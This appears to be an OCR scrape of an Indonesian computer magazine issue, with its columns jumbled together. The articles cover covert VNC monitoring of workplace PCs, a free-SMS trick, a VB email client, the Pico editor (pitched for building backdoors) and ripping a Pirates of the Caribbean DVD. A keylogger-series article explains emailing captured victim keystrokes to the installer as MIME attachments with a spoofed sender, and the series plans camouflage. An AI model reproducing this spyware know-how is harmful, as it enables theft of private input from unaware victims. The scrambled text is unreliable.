Gambar 17. Mencetak berkas (dokumen) secara remote. Gambar 20. Mengedit Registry secara remote.
Gambar 18. Bermain game secara remote. Gambar 21. Men-shutdown komputer secara remote.
VI RTUAL N ET WO R K CO M P UTI N G
Spion Boss di Tempat Kerja
Adjie Benni (benipro@telkom.net) dengan cerdik memanfaatkan software gratis
Virtual Network Computing (VNC) untuk melakukan pengawasan terhadap pemakaian
komputer-komputer dalam suatu jaringan. Pengawasan melekat tanpa perlu mendekat.
Gambar 10. Kotak Dialog Gambar 11. Kotak Dialog Gambar 17. Contoh Kotak
Siap Melakukan Instalasi Proses Instalasi Dialog Network di Windows
K H U S U S M E NTAR I / MATR I X
Kirim SMS Bisa Gratis!
Wahyu Arinto Nugroho (arinto@yahoo.com) mengungkap fasilitas SMS gratis Satelindo, yang
mensyaratkan pendaftaran di sisi penerima SMS, bukan sisi pengirim SMS.
ahukah anda bahwa Satelindo Email sent to: Caranya ialah dengan membuka
T memberikan fasilitas SMS
gratis khusus untuk sesama
+628151234567@SATELINDOGSM.COM
Pesan di atas menunjukkan bahwa pesan
http://vcom.satelindogsm.com/filter/login.jsp
pemakai kartu Mentari dan Matrix? telah dikirimkan ke ponsel Arif. Pada ponsel
Layanan ini tidak banyak diketahui Arif, akan muncul contoh pesan sebagai
berikut:
orang dan untuk memanfaatkannya
perlu menggunakan ‘akal.’ FROM +628157654321@satelindogsm.com-
1516hrs,13/09/2003-Email from:
Persyaratan dan Mekanismenya +628157654321- SAYA SUDAH SAMPAI
DI BANDUNG
Untuk bisa menggunakan layanan ini:
• Anda dan orang yang akan menerima Kemana dan Cara Mendaftar
SMS dari Anda adalah pelanggan Sate-
lindo dan memiliki kartu GSM Untuk mendaftar buka:
Mentari/Matrix/SatelindoGSM http://vcom.satelindogsm.com/filter/register.jsp lalu masukkan nomor ponsel dan
• Anda dan orang yang akan menerima password. Jika Anda lupa password-
SMS dari Anda telah terdaftar sebagai
pengguna satelindomail. nya, mintalah password yang baru.
• Anda dan orang yang akan menerima Setelah login, klik , kemudian
SMS dari Anda telah mengisi filter email isikan pada salah
pada satelindogsm dengan tepat. satu dari 3 filter,
Perlu diketahui bahwa bagi pelanggan isikan dengan
Satelindo yang akan mengirim email
tidak perlu mendaftarkan diri terlebih @satelindogsm.com:
dahulu. Jadi sebenarnya pendaftaran Setelah itu, klik
ini berguna agar Anda dapat mene -
Selanjutnya Anda dapat melakukan
rima email alias SMS dari rekan Anda. Perlu diketahui bahwa setelah pendaf- pengujian dengan mencoba mengi-
SMS gratis ini legal (bukan merupa- taran berhasil, Anda akan menerima rimkan SMS gratis ke nomor ponsel
kan pelanggaran hukum), karena ha- SMS dari 777 berisi 6 digit password. Anda sendiri.
nya memanfaatkan fasilitas pengi- Contoh SMS yang akan diterima se- Untuk mengecek pulsa dengan cepat,
riman email satelindo yang memang telah mendaftar: dial ke *555#. Lalu kirim SMS ke 777
tidak dipungut biaya. Sang pengirim
Your password is 131503 dengan isi SMS sebagaimana yang
cukup mengirim SMS, selanjutnya di
telah dicontohkan. Setelah itu kem-
perjalanan, SMS tersebut diubah men- Password ini tidak perlu Anda simpan bali dial ke *555# untuk mengecek
jadi e-mail, kemudian dikonversi kem- dalam jangka waktu yang lama kare- pulsa, dan syukurilah bahwa pulsa
bali menjadi SMS kepada penerima. na hanya dipakai 1 kali. Anda belum berkurang.
Misalkan: Jika Anda lupa, pergilah ke
Pelanggan Satelindo bernama Heru (dengan http://202.152.162.251/filter/requestpw.jsp
Mengapa Harus Mendaftar?
nomor ponsel 08151234567) akan mengirim
SMS gratis kepada Arif. Perlu diketahui bahwa jika Anda ha-
nya ingin mengirim email, Anda ti-
Prinsip kerjanya adalah sebagai berikut: dak perlu mendaftarkan diri terlebih
(dengan asumsi bahwa Heru adalah pe-
langgan satelindo dan Arif telah memenuhi dahulu. Pendaftaran ini hanya ber-
semua persyaratan di atas, dan nomor guna agar Anda dapat menerima
ponsel Arif adalah 08157654321): email alias SMS dari rekan Anda.
Heru mengetikkan pesan : Agar Anda dapat mengirimkan SMS
Mail 08151234567@satelindogsm.com Saya gratis kepada rekan Anda, daftarkan
sudah sampai di Bandung rekan Anda, atau beritahukanlah ke-
Heru mengirimkan pesan tersebut ke 777 maka 777 akan memberikan password padanya untuk segera mendaftar.
yang baru
Jika semua berjalan normal, Heru akan Siapa yang Dapat Menerima SMS?
menerima pesan konfirmasi sebagaimana Bila Anda telah terdaftar (pernah men-
biasanya, bahwa 777 telah menerima pesan daftar sebelumnya), anda perlu meng- SMS yang Anda kirim hanya dapat
Anda atur filter email agar email yang re- diterima pada ponsel yang nomornya
Selanjutnya Heru akan menerima pesan kan Anda kirimkan ke alamat Anda telah terdaftar dan filter emailnya
konfirmasi kedua dari 777 sebagai berikut: dapat Anda terima. telah diatur dengan tepat.
S M T P U N T U K K E Y LO G G E R
Mampu Mengirim Attachment
Dewanata (m_strdewanata@yahoo.com) melanjutkan pembahasan mengenai keylogger dengan
keylogger yang mempunyai kemampuan mengirim email dengan attachment.
3. Content-Transfer-Encoding
A
RTIKEL INI ADALAH ARTIKEL KELIMA DARI SERANGKAIAN
artikel yang membahas pembuatan program keylog- Menjelaskan tipe enkoding yang digunakan. Seperti
ger. Pada artikel sebelumnya, telah dijelaskan menge- dijelaskan pada artikel sebelumnya, format data yang
nai pengiriman email via SMTP dan mekanisme otentikasi- didukung smtp adalah 7-bit US-ASCII karakter. Karena
nya [via ESMTP]. pada umumnya file yang dikirim mempunyai format 8-
bit atau data binari, data tersebut harus melewati proses
Pada artikel tersebut, juga telah dikembangkan satu SMTP enkoding terlebih dahulu. Tipe enkoding yang didukung
engine sebagai implementasi teori. Idenya, SMTP engine ini antara lain: 7bit, 8bit, binary, quoted-printable, dan base64.
akan ditempelkan ke keylogger sehingga hasil tangkapan dari
komputer si korban akan secara otomatis terkirim ke si pema- 4. Baris indikasi boundary.
sang via email. Untuk demo, pada artikel terdahulu penulis pesan. Sebelumnya, string yang dipakai sebagai
telah mengembangkan satu software MFC untuk mengirim- indikator harus didefinisikan terlebih dahulu di
kan email plus otentikasi, bernama MAILER. Content-Type header.
Untuk melengkapi pembahasan mengenai SMTP, pada artikel Contoh Implementasi
ini akan diterangkan mekanisme pengiriman file/attachment
via SMTP. Sebelumnya, banyak pembaca yang bertanya ke Untuk lebih jelas, ada baiknya kita langsung ke contoh. Pada
penulis, apa bedanya keylogger/trojan (+
+smtp engine) yang contoh di bawah, diskenariokan email yang akan dikirim
dibangun penulis dengan yang tersedia di Internet/market? mempunyai satu pesan teks singkat dan satu attachment
teks file bernama test.txt.
Memang, mungkin produk sejenis banyak tersedia di market,
tapi tujuan penulis di sini adalah untuk menerangkan konsep Isi pesan adalah sebagai berikut:
dasar dan teknik pemrogramannya, bukan hanya sekedar Data dikirim dari komputer dewanata jam 17:30, Dec 6 2003.
bagaimana menggunakan produk-produk tadi.
Isi file test.txt adalah sebagai berikut:
Attachment
ketikan ini adalah hasil tangkapan keylogger yang dikirimkan
Dewasa ini, email (smtp) adalah jenis produk Internet ter- secara otomatis via email, sebagai attachment.
sibuk kedua setelah web (http). Yang unik, konsep yang me-
latarbelakangi produk ini tidak banyak berubah sejak diper- Ini adalah badan/body email. Nomor baris adalah sekedar
kenalkannya RFC 821/822 di awal 80-an, era pesan teks. penjelas dan bukan bagian dari badan email.
Konsep attachment (kirim file binari via smtp) sebenarnya 00 Date: 1 Jan 2004 00:00:01
tidak diterangkan di RFC tersebut. Untuk itu, beberapa RFC 01 Subject: Hasil tangkapan
lainnya diperkenalkan untuk melengkapi kekurangan ini 02 To: m_strdewanata@yahoo.com
dan satu diantaranya adalah RFC 2045. 03 From: "Mr. Gates" <gates@microsoft.co.id>
RFC ini menerangkan secara rinci tata-cara pengiriman 04 MIME-Version: 1.0
muatan attachment di badan email dengan format yang di- 05 Content-Type: multipart/mixed;
sebut MIME (Multipurpose Internet Mail Extensions). Pe- 06 boundary= "**INI_BOUNDARY_DEWANATA**"
nulis tidak akan membahas format ini secara rinci, namun 07
jika Anda ingin mengetahui lebih detail silahkan buka 08 --**INI_BOUNDARY_DEWANATA**
http://www.faqs.org/rfcs/rfc2045.html. 09 Content-Type: text/plain; charset=US-ASCII
10
Apa Perbedaannya? 11 Data dikirim dari komputer Mr. Gates jam 17:30, Dec 6 2003
12
Perbedaan mendasar jika dibandingkan dengan artikel ter-
13 --**INI_BOUNDARY_DEWANATA**
dahulu terletak pada badan/body email (bagian DATA). Ter-
14 Content-Type: text/plain; charset=US-ASCII
dapat beberapa baris tambahan yang berguna untuk memi-
15 Content-Transfer-Encoding: 8bit
sahkan dan mendefinisikan masing-masing bagian: bagian
16 Content-Disposition: attachment; filename= "test.txt"
pesan (teks US-ASCII biasa atau formated text) dan bagian
17
attachment (yang bisa terdiri atas beberapa file). Baris-baris
18 ketikan ini adalah hasil tangkapan keylogger yang dikirimkan
tambahan tersebut adalah sebagai berikut:
secara
1. MIME-Version header 19 otomatis via email, sebagai attachment.
Adalah baris yang menginformasikan versi MIME yang 20
dipakai. 21 --**INI_BOUNDARY_DEWANATA**--
2. Content-Type header
Penjelasan masing-masing baris dapat Anda baca di Tabel 1
Menjelaskan tipe data yang terkandung di dalam satu berikut ini:
bagian.
32 NeoTek Vol. IV No. 03
NeoTutor
Tabel 1.
Baris Keterangan
0-3 Header email. Pada contoh ini, digunakan data fiktif
4 MIME version header
5 Content-Type header
6 Pendefinisian indikator boundary.
Pada kasus ini, string boundary adalah **INI_BOUNDARY_DEWANATA**
Anda bisa memilih apa saja sebagai string boundary
7 Baris kosong
8 Tanda boundary. Awal dari bagian pesan teks.
Perhatikan tanda -- di awal string.
9 Content-Type dari pesan teks
10 Baris kosong
11 Isi dari pesan teks
12 Baris kosong
13 Tanda boundary. Awal dari attachment. Catatan:
14 Content-Type attachment. Karena pesan kita adalah
15 Tipe enkoding. Digunakan 8bit, karena yang dikirim adalah file teks
Dewan External adalah alias dari
16 Penjelasan bahwa bagian ini adalah attachment. m_strdewanata@yahoo.com di komputer penulis.
17 Baris kosong Dan jika attachment test.txt dibuka akan terbaca seperti ini.
18-19 Isi dari file teks
20 Baris kosong
21 Tanda boundary. Perhatikan bahwa ada tanda -- di kedua sisi, yang berarti
akhir dari badan email.
Untuk baris 15, jika file yang dikirimkan adalah file binary,
misal: exe, doc, atau lainnya, maka idealnya gunakan tipe
enkoding base64. Isi file yang telah di-enkode, di-dump di
baris 18 sampai selesai.
Untuk implementasi, Anda bisa menggunakan program
MAILER yang diperkenalkan penulis pada artikel di edisi
terdahulu.
Rangkaian Artikel Keylogger
Artikel ini merupakan rangkaian artikel tentang
pembuatan keylogger yang sudah dan akan dimuat di
nomor-nomor NeoTek sebagai berikut:
C++ Workshop: Membuat Sendiri Keylogger
NeoTek III/8
Pengenalan konsep keylogger
Pembuatan kerangka utama program keylogger
Keylogger v. 2.0: Modifikasi srv32.exe dan srv32.dll
NeoTek III/12
Pencegahan dua instan keylogger aktif di memori, menggunakan mutex
Identifikasi program yang aktif ketika dilakukan pengetikan
Hasil Intersepsi Keylogger Dikirim Otomatis ke Pemasang
NeoTek IV/1
Konsep pengiriman SMTP
Pembuatan mesin SMTP untuk keylogger, menggunakan open relay SMTP
SMTP untuk Keylogger: Menggunakan Subscribed SMTP
NeoTek IV/2
Konsep otentikasi SMTP, menggunakan verb AUTH
Pembuatan mesin SMTP yang dilengkapi dengan otentikasi
Demo GUI MFC
Penjelasannya pada Tebel 2 berikut:
SMTP untuk Keylogger: Mampu Mengirim Attachment
Tabel 2. NeoTek IV/3
Konsep attachment pada email
Pembuatan mesin SMTP yang berkemampuan mengirimkan attachment
Field Keterangan
SMTP Server smtp server yang kita gunakan Akan Dimuat di Nomor-nomor Mendatang::
Port port number service smtp di server
Username username yang telah kita daftarkan sebelumnya Keylogger dengan Kemampuan Kamuflase
NeoTek IV/4
Password Password Finalisasi keylogger
MAIL FROM: si pengirim. hotpop mengharuskan sama dengan username Deployment menggunakan NSIS, kamuflase 'mirip Flash'.
RCPT TO: alamat email yang dituju
Content: terdiri atas header dan badan/body. Addendum untuk Keylogger: Format Base64
NeoTek IV/5
Isi header pada kasus ini adalah data fiktif.
Penjelasan mengenai format Base64
Bagian body dimulai dari baris 'MIME-Version: 1.0'. Pembuatan Base64 Encoder
Isi header dan body telah diterangkan sebelumnya.
VI S UAL BAS I C WO R KS H O P
Membuat Email Client Sendiri
Wawan Ridwan (iniemailwawan@telkom.net) kali ini membahas cara membuat email client
sendiri menggunakan Visual Basic dengan memanfaatkan DEVMAILER.DLL suatu component
object model dari Geocel yang bisa anda peroleh gratis.
EBELUM SAYA MENJELASKAN PROGRAM INI, TERLEBIH NamaPengirim. Sesuai dengan namanya, object ini
S dahulu anda akan saya ajak untuk mengkhayal.
Atau tepatnya menciptakan keadaan yang diada-
nantinya akan dipakai sebagai kolom yang harus diisi
dengan Nama Pengirim email pada saat program
adakan supaya ada. Kenapa harus diada-adakan? Karena dijalankan (Untuk memberi nama pada sebuah object
keadaan yang akan kita adakan dalam khayalan kita ini saya kira anda sudah tahu caranya, yakni melalui
tidak pernah atau jarang ada. Kenapa keadaan yang jarang jendela Properties pada kolom Name.
ada itu harus diada-adakan? Karena jika keadaan yang Object TextBox kedua kita namakan EmailPengirim.
diada-adakan itu tidak ada, maka saya tidak bisa menjelas- Object ini pun namanya kita sesuaikan dengan fungsi-
kan kegunaan program ini. nya yakni untuk memasukkan alamat email pengirim.
Begini khayalannya. Suatu ketika kita ingin berkirim Object TextBox ketiga adalah object text yang diguna-
email kepada teman kita, saudara kita, sejawat kita, atau kan untuk memasukkan alamat email penerima. Nama
kepada siapa pun yang kita inginkan. Tetapi alangkah object ini kita sesuaikan juga dengan fungsinya yaitu
kecewanya, karena program email client seperti milik kita EmailPenerima.
Outlook atau Eudora dsb. tidak mau berjalan sebagaimana
mestinya. Object TextBox keempat digunakan untuk
memasukkan SMTP server. Kita namakan saja object
Outlook ngambek, nggak mau mengirimkan email kita, TextBox ini SMTP_Server.
karena Outlook-nya hasil bajakan sejak diberlakukan
Undang-undang Hak Cipta. Eudora diem ajah karena Object TextBox yang kelima kita beri nama Judul.
kecapekan sudah terlalu sering dia jadi kurir email kita. Object ini digunakan untuk menuliskan subject email
Dalam keadaan yang mengada-ada ini apa yang harus kita kita.
lakukan? Apakah kita harus membatalkan rencana Object TextBox yang keenam digunakan untuk mema-
mengirim email kita? Apakah kita harus pasrah terhadap sukkan pesan atau isi email yang akan kita kirim. Atau
keadaan itu? dalam program email client lazim disebut Body. Apa
Pasrah? Tak u'-u' ya. Jangan pasrah terhadap keadaan nama untuk object yang satu ini ? Kita namakan Body
yang mengada-ada itu. Lupakan Outlook, lupakan Eudora. juga ? Terserah anda! Tapi karena saya sedang berbi-
Mari kita membuat sendiri program pengirim email kita. cara dengan orang Indonesia lebih baik kita namakan
Dengan Visual Basic. saja object ini dengan nama Pesan.
Salome2005 2. OptionButton
Saya memberi nama program yang akan kita buat ini Langkah berikutnya kita pasangkan dua buah object
dengan Salome2005. Saya sendiri tidak tahu kenapa pro- OptionButton. Kedua object ini berguna untuk
gram yang akan kita ciptakan ini saya namakan memilih tingkat proritas email yang akan kita kirim,
Salome2005. Low atau High. Silakan anda pasangkan kedua object
yang saya maksud dan beri nama untuk kedua object
Kalau anda suka, anda sendiri bisa menamakan program tersebut yang satu Low dan yang lainnya High. Anda
yang akan kita ciptakan ini sesuka hati anda, misalnya pun dipersilakan untuk memberi nilai default
Ketoprak69, KurirEmail2003, atau AuAh Elap atau apa properties Value salah satu object dengan True atau
saja, silakan. Program ini dirancang menggunakan Visual False.
Basic. Anda bisa menggunakan Visual Basic 6 atau 5.
Program ini berguna untuk mengirim email. Berikut ini 3. CommandButton
adalah langkah-langkah untuk membuat program ini. Menurut saya, jarang sekali program serius yang tidak
ada tombolnya. Tombol itu sangat bermanfaat lho, ter-
Perencanaan Interface dan Obyek utama untuk mengeksekusi perintah dalam kode-kode
Jalankan Visual Basic, kemudian buat Form baru dan program kita yang aksinya dipicu oleh user/pengguna.
namakan form tersebut dengan Salome atau terserah Saya bukan mau ikut-ikutan memasangkan tombol,
anda. Kemudian tempatkan beberapa komponen- jadi segeralah anda pasangkan satu buah object
komponen object berikut ini dalam form tadi: CommandButton dalam form kita tadi. Dan namakan
1. Text Box CommandButton tersebut dengan nama Kirim. Kenapa
object ini dinamakan Kirim? Karena object inilah yang
Dalam program pengirim email ini kita membutuhkan akan menjalankan perintah pengiriman email kita
object TextBox sebanyak 6 buah: nanti.
Object TextBox pertama kita beri nama
34 NeoTek Vol. IV No. 03
NeoTutor
End If
VI S UAL BAS I C WO R KS H O P
Membuat Notepad Sendiri
MA Rody Candera (odyxb@melva.org) melanjutkan pembahasan pemrograman dengan
Visual Basic. Kali ini membahas cara membuat text editor sendiri yang
berpenampilan seperti Notepad.
Form Unload
List nama Control pilih Form dan List nama Event pilih
Unload. Lalu tuliskan kodenya:
A = MsgBox("Klik YES untuk menyimpan pekerjaan Anda sebelum
keluar", vbQuestion + vbYesNo)
If A = vbYes Then
CommonDialog1.DialogTitle = "Simpan File Teks"
CommonDialog1.ShowSave
Else
If A = vbNo Then
End
End If
End If
Kembali ke Dasar
Menguasai Teks Editor Pico
Untuk bisa membuat sendiri backdoor ataupun memodifikasi dan meng-compile
program dalam Linux, maka paling tidak anda sudah harus menguasai text editor
lebih baik, karena selain lebih praktis, alamat situs tersebut di bawah ini :
cara mengoperasikannya juga tidak · http://www.leftfoot.com/freeshells.html
terlalu rumit. Editor Pico tidak ada · http://www.ductape.net/~mitja/freeunix.shtml
· http://www.audiobraille.org/blinux/
ubahnya seperti program pengolah
· http://www.publiclinux.net
kata WordStar.
Proses pembuatan (registrasi) shell
· TinyTERM
Kegunaan Pico account hampir sama dengan cara http://www.midware.com/tterm.html
meregister alamat email seperti yang http://www.trtec.com.br/pages/dtinyterm.html
Bagi sebagian besar pengguna Inter- ada di http://mail.yahoo.com, atau http://ftp.censoft.com/download/windows/TinyTER
net, khususnya para peserta chat di http://www.hotmail.com. M_Plus_Edition/ttplus-current.exe
IRC (Internet Relay Chat) yang su-
dah mengetahui fungsi dan manfaat Anda cukup memasukkan nama leng-
shell account, tentu suatu saat akan kap anda (fullname), alamat rumah,
memerlukan editor Pico untuk mela- alamat email, jenis kelamin (sex), tang-
kukan beberapa hal, misalnya mem- gal lahir, nama login (user ID), dan
buat script atau merubah isi file kon- kata sandi (password).
figurasi program seperti Exploit, BNC Ketika anda meregistrasi sebuah shell
(Bouncer), PsyBNC, Eggdrop, dan IRCD, account, maka secara otomatis anda
yang wajib dilakukan terlebih dahulu juga akan membutuhkan sebuah soft-
sebelum di-suspend ke dalam suatu ware yang akan anda pakai sebagai
proses yang bersifat background (BG). alat untuk masuk ke dalam shell yang
Untuk keperluan yang lain, Pico juga anda buat tadi.
Gambar 2. Tampilan program emulasi
bisa dimanfaatkan sebagai media un- Khusus bagi pengguna sistem operasi
tuk menulis listing program bereks- · NetTERM
Windows 95/98/ME/2000/XP atau http://www.securenetterm.com
tensi .c, .gcc, .pl, .cgi. Dan satu hal lagi NT, perangkat lunak atau yang lebih http://www.netterm.com/
yang juga perlu dicatat, salah satu pro- tepat disebut sebagai program emu- http://www.rocketdownload.com
gram email yang bekerja pada sistem lasi terminal, mutlak dibutuhkan. http://www.keyscreen.com/KeyScreen(s)/NetTerm.htm
http://www.u.arizona.edu/~djharris/internet/netterm.html
operasi UNIX, yaitu Pine, juga meng-
gunakan editor Pico sebagai fasilitas Catatan
Ada beberapa program emulasi terminal yang
untuk menulis (compose) mail. bisa anda pakai mengakses editor Pico pada
Oleh karena itu jika belum mahir meng- shell account yang anda registrasi tadi.
operasikannya, khususnya bagi anda Misalnya Telnet (yang sudah sejak lama ada
dalam hard disk komputer anda), puTTy,
peserta chat di IRC yang sama sekali TinyTERM, dan NetTERM.
belum memiliki shell account, namun
selalu berharap agar suatu hari kelak Dari pengalaman saya selama menggu-
nanti dapat menginstal dan meng-compile nakan program-program di atas, pro-
sendiri source code BNC, PsyBNC, gram yang sering saya pakai dan paling
Eggdrop, atau IRCD, maka ada baik- saya sukai adalah puTTy, alasannya
nya mulai sekarang mulai membiasa- cuma satu, yaitu karena puTTy meng-
kan diri bekerja dengan editor ini. ijinkan kita me-maximize-kan jendela
Gambar 3. Tampilan program emulasi
Gambar 4. Membuat file teks baru menggunakan editor Pico Gambar 6. Membuat file baru dengan nama LATIHAN
Gambar 5. Melihat isi sebuah file menggunakan editor Gambar 7. Mengubah nama file menjadi LATIHAN.TXT pada
Sedangkan kalau anda bermaksud melihat isi sebuah file, Untuk bahan praktek anda, coba buat sebuah file baru de-
maka yang anda lakukan adalah mengetik pico di prompt ngan nama LATIHAN, lalu ketik sembarang teks sebagai
system dengan diikuti nama file yang akan dilihat. Seba- isinya. Setelah selesai, tekan tombol Ctrl+O untuk me-
gai contoh misalnya anda ingin melihat isi file README, nyimpan. Pada saat anda menekan tombol tersebut, Pico
pada prompt system ketik pico README. akan meminta konfirmasi terlebih dahulu untuk mena-
nyakan apakah anda akan tetap menyimpan dengan nama
Perintah-perintah pada Editor Pico file yang pertama tadi, yaitu LATIHAN.
Pico juga memiliki sejumlah perintah yang berguna un- Jika anda tidak bermaksud merubahnya, maka lanjutkan
tuk membantu melakukan beberapa hal, misalnya meng- lah dengan menekan tombol Enter. Tapi jika anda ingin
geser layar dan kursor, menyisipkan teks, menghapus, dan merubahnya dengan nama yang lain, atau sekedar me-
menyimpan teks ke dalam file. Perintah-perintahnya sbb: nambah ekstensinya, maka ketiklah nama file atau eks-
tensi yang anda kehendaki, kemudian tekan tombol Enter.
Jika anda sudah selesai dan ingin keluar dari editor Pico,
tekan lah tombol Ctrl+X (Exit) untuk mengakhirinya.
Demikian lah akhir penjelasan tentang cara menggunakan
dan mengoperasikan program editor Pico, mudah-mudah-
an dapat lebih dipahami.
Jika anda masih membutuhkan informasi yang lebih
detail lagi mengenai editor tersebut, anda bisa mengetik
perintah "man pico" di prompt system shell account
anda.
Akhir kata, saya ingin mengucapkan terimakasih kepada
semua kru Majalah Neotek dan juga pada rekan-rekan di
#Neoteker yang juga memberikan support-nya untuk
perkembangan dan kemajuan Majalah ini. (Tricksy)
KONVERSI VIDEO
EMINDAHKAN ISI CD KE HARD disk, apakah itu dari VTS_01_2.VOB, VTS_01_3.VOB, Konversi DVD disk menjadi
M audio CD, VCD, ataupun DVD dikenal sebagai
ripping. Berbeda dengan TMPGEnc yang melaku-
VTS_01_4.VOB,dan VTS_01_5.VOB. VCD disk mencakup tahap-
Kita kenali bahwa video ini terdiri tahap sebagai berikut:
kan encoding, yaitu membaca DVD disk dan mengkonver- dari lima file VOB (Video Object • DVD Ripping
sinya menjadi file *.mpg atau *.avi dan menyimpannya ke file). Kelima VOB file ini yang • VOB Decoding
hard disk, maka ripping hanya memindahkan isi disk ke akan menjadi perhatian kita dalm • MPEG-1 Encoding
hard disk tanpa mengubah formatnya. proses konversi. • MPG File Splitting
Memindahkan isi DVD ke hard disk dapat dilakukan de- Klik pada icon folder dan tetapkan • VCD Burning
ngan menggunakan DVD Decrypter, yang dimuat di CD dimana kita akan menyimpan
NeoTek edisi ini maupun yang lalu. Lihat kembali NeoTek hasil ripping. Misalnya di C:\dvd_dump. Selanjutnya pilih File
IV/2 ataupun III/10 yang banyak membahas struktur file > Decrypt (atau klik icon Decrypt) dan tunggu sampai selesai.
pada DVD disk.
Diasumsikan bahwa anda mempunyai CD-RW drive serta
DVD ROM drive (atau DVD ROM/RW Combo), yang ar-
tinya dapat membaca DVD disk dan mem-burn ke CD disk.
Masukkan DVD video yang akan di-rip ke dalam DVD ROM
drive, lalu jalankan DVD Decrypter. Di sini kita akan
mengkonversi DVD disk Pirates of the Caribbean: The
Curse of The Black Pearl menjadi dua VCD disk.
Tampilan pembuka DVD Encrypter yang membaca DVD video yang ada
di drive F: sebagai F:\Logical label. Ini adalah tampilan IFO Mode.
DVD2AVI
Jalankan DVD2AVI dan buka file-file VOB: File > Open.
Cikup buka file VOB yang pertama dan semua yang
betikutnya akan ikut dimuat oleh DVD2AVI.
Setting Video dan Audio Selanjutnya pilih File > Save Project [F4] dan pilih untuk
men-save file D2V (beri nama misalnya pirate.d2v) ke di-
rektori yang sama tempat anda menyimpan VOB file (d-
alam hal ini di C:\dvd_dump).
Diperlukan waktu beberapa menit un-
tuk menyimpan project file (berupa
pirate.d2v untuk audio dan suatu file
mpa untuk audio-nya). Akan tampil
informasi tentang proses ini yang ber-
isi karakteristik DVD sumber. Catat
informasi ini sebab akan diperlukan
oleh TMPGEnc kelak.
Terlihat bahwa DVD video sumbernya
berformat NTSC dengan format audio
MPEG audio. Pada DVD video lain akan
lain lagi informasi yang didapat.
Kedua file yang dibentuk ukurannya
cukup kecil sebab file D2V yang 638
KB hanyalah informasi apabila file
VOB memang diubah menjadi AVI.
N
ERO BURNING ROM DISERTAKAN
BERSAMA CD BURNER yang
anda beli (atau software lain
yang serupa). Pemakaiannya sangat
mudah, mulai dari Start menu: Start
> Ahead Nero > Nero - Burning Rom
Nero Wizard
Pada layar Nero Wizard:
Compile a New CD, klik Next.
Pilih Other CD format, klik Next.
Pilih Video CD, klik Next, lalu Masukkan CD-R blank dan pilih File
Finish. > Write CD dan pada jendela wizard
Akan tampil dua pane tambahan di yang tanpil klik tombol Burn.
bawah menu bar Nero, yaitu untuk Proses burn akan berlangsung dan
Video1 dan File Browser. jadilah VCD anda yang pertama.
Drag-and-drop pirate-1.mpg dari lakukan hal yang sama terhadap file
pane kanan (File Browser) ke pane pirate-2.mpg untuk mendapatkan
kiri bawah (Video1). VCD yang kedua.
Iklan visionnet